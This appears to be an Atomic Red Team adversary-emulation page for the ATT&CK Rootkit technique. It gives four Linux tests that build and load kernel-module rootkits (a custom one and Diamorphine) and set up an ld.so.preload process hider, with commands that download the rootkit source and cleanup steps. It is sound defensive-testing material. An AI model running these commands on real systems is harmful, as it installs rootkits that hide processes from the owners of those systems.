T1014 - Rootkit
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
Atomic Tests
Atomic Test #1 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
Supported Platforms: Linux
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
| rootkit_name | Module name | string | T1014|
Attack Commands: Run with
1
| sudo insmod #{rootkit_path}/#{rootkit_name}.ko
|
Cleanup Commands:
1
2
| sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
|
Dependencies: Run with
Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
Check Prereq Commands:
1
| if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
|
Get Prereq Commands:
1
2
3
4
5
6
7
8
| sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp #{rootkit_source_path}/* /tmp/T1014/
cd /tmp/T1014; make
mkdir #{rootkit_path}
mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014
|
Atomic Test #2 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
Supported Platforms: Linux
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_name | Module name | string | T1014|
Attack Commands: Run with
1
| sudo modprobe #{rootkit_name}
|
Cleanup Commands:
1
2
3
| sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
|
Dependencies: Run with
Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
Check Prereq Commands:
1
| if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
|
Get Prereq Commands:
1
2
3
4
5
6
7
8
| sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;
cp #{rootkit_source_path}/* /tmp/T1014
cd /tmp/T1014; make
sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014
sudo depmod -a
|
Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
Supported Platforms: Linux
auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| repo | Url of the github repo zip | string | https://github.com/gianlucaborello/libprocesshider/|
| rev | Revision of the github repo zip | string | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
| library_path | Full path of the library to add to ld.so.preload | string | /usr/local/lib/libprocesshider.so|
Attack Commands: Run with
1
2
| echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
|
Cleanup Commands:
1
2
| sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
|
Dependencies: Run with
Description: The preload library must exist on disk at specified location (#{library_path})
Check Prereq Commands:
1
| if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
|
Get Prereq Commands:
1
2
3
4
5
| mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
make
cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py
|
Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
Loads Diamorphine kernel module, which hides itself and a processes.
Supported Platforms: Linux
auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| repo | Url of the diamorphine github repo | string | https://github.com/m0nad/Diamorphine/|
| rev | Revision of the github repo zip | string | 898810523aa2033f582a4a5903ffe453334044f9|
| rootkit_name | Module name | string | diamorphine|
Attack Commands: Run with
1
2
3
4
5
| sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
|
Cleanup Commands:
1
2
3
4
| kill -63 1
sudo modprobe -r #{rootkit_name}
sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a
|
Dependencies: Run with
Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
Check Prereq Commands:
1
| if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
|
Get Prereq Commands:
1
2
3
4
5
| mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
make
sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
|